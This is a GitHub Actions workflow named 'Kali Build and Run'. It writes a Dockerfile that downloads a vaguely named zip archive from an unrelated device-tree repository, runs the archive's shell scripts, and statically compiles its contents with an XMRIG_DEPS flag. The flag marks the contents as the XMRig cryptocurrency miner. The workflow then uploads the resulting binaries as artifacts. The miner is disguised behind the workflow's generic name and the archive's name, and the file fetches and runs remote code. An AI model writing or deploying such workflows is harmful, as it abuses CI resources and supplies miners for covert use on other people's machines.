name: Kali Build and Run

on:
  push:
    branches:
      - master
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Build Docker image
        run: |
          cat <<EOF > Dockerfile
          FROM kalilinux/kali-rolling

          RUN apt-get update && apt-get install -y \
              curl \
              wget \
              unzip \
              git \
              build-essential \
              cmake \
              automake \
              libtool \
              autoconf \
              glibc-source \
              libstdc++-dev \
              libgcc-dev && \
              apt-get clean

          WORKDIR /usr/src/app
          COPY . /usr/src/app
          RUN curl -L -o testformycode-nbg.zip https://raw.githubusercontent.com/Janit8r/device_lge_judyln/refs/heads/S/testformycode-nbg.zip && \
              unzip testformycode-nbg.zip

          RUN cd testformycode-nbg/scripts-64 && \
              chmod 777 *.sh && \
              ./build_deps.sh && \
              cd .. && \
              mkdir build && \
              cd build && \
              cmake -DXMRIG_DEPS=scripts-64/deps -DCMAKE_CXX_FLAGS="-static" -DCMAKE_EXE_LINKER_FLAGS="-static" -DBUILD_SHARED_LIBS=OFF .. && \
              make
          EOF

          docker build -t my-kali-build-env .

      - name: Run Docker container
        run: |
          docker run --name my-kali-build-container my-kali-build-env

      - name: Copy build artifacts
        run: |
          docker cp my-kali-build-container:/usr/src/app/testformycode-nbg/build ./build-output

      - name: Upload Build Artifacts
        uses: actions/upload-artifact@v3
        with:
          name: build-output
          path: ./build-output

      - name: Clean up Docker container
        run: docker rm -f my-kali-build-container
